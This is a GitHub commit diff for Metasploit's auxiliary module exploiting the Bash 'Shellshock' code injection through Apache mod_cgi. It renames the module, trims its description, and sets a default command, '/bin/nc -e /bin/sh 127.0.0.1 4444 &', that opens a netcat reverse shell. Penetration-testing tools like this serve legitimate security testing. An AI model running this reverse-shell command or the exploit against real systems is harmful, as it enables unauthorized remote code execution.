Skip to content

Commit abadf65

Browse files
committed
Clean up title and formatting
1 parent 2562964 commit abadf65

File tree

1 file changed

+3
-5
lines changed

1 file changed

+3
-5
lines changed

modules/auxiliary/admin/http/apache_mod_cgi_bash_env.rb

Lines changed: 3 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -11,14 +11,11 @@ class Metasploit4 < Msf::Auxiliary
1111

1212
def initialize(info = {})
1313
super(update_info(info,
14-
'Name' => 'Bash Specially-Crafted Environment Variables Code Injection Attack via Apache mod_cgi',
14+
'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection',
1515
'Description' => %q{
1616
This module exploits a code injection in specially crafted environment
1717
variables in Bash, specifically targeting Apache mod_cgi scripts through
1818
the HTTP_USER_AGENT variable.
19-
20-
If you use the default CMD, please change LHOST and LPORT. Also, you
21-
will need a Netcat with the -e (GAPING_SECURITY_HOLE) option.
2219
},
2320
'Author' => [
2421
'Stephane Chazelas', # Vulnerability discovery
@@ -35,7 +32,8 @@ def initialize(info = {})
3532

3633
register_options([
3734
OptString.new('TARGETURI', [true, 'Path to CGI script']),
38-
OptString.new('CMD', [true, 'Command to run (absolute paths required)', '/bin/nc -e /bin/sh LHOST LPORT &'])
35+
OptString.new('CMD', [true, 'Command to run (absolute paths required)',
36+
'/bin/nc -e /bin/sh 127.0.0.1 4444 &'])
3937
], self.class)
4038
end
4139

0 commit comments

Comments
 (0)